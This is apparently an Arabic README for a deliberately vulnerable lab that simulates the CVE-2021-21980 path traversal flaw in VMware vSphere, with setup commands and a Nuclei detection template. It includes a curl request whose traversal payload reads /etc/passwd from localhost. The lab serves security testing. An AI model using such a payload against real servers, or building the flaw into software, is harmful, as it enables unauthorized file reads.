
مختبر ثغرات واقعي لـ CVE-2021-21980 (اجتياز المسار في VMware vSphere) - استغلال ملفات فعلي، وليس خادمًا وهميًا
بيئة اختبار واقعية تحاكي ثغرة اجتياز المسار (Path Traversal) في VMware vSphere Web Client.
⚠️ تحذير: بيئة اختبار ضعيفة. لا تعرّضها للإنترنت!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ يقرأ الملفات فعلياً من نظام ملفات الحاوية باستخدام Python file I/O
✅ سلوك واقعي - يتعامل مع اجتياز المسار مثل vSphere الحقيقي
✅ ترويسات VMware - يتضمن Server: VMware-HTTP-Server/1.0
✅ SSL/TLS - توليد شهادة موقّعة ذاتياً
✅ غير مبرمجة بشكل ثابت - تُرجع محتوى الملفات الفعلي
Dockerfile - إعداد بناء الحاويةserver.py - تطبيق Flask القابل للاختراقCVE-2021-21980.yaml - قالب كشف NucleiREADME.md - هذا الملفتم التحقق من صحة هذه البيئة باستخدام Nuclei، حيث أظهر:
podman stop vcenter-lab && podman rm vcenter-lab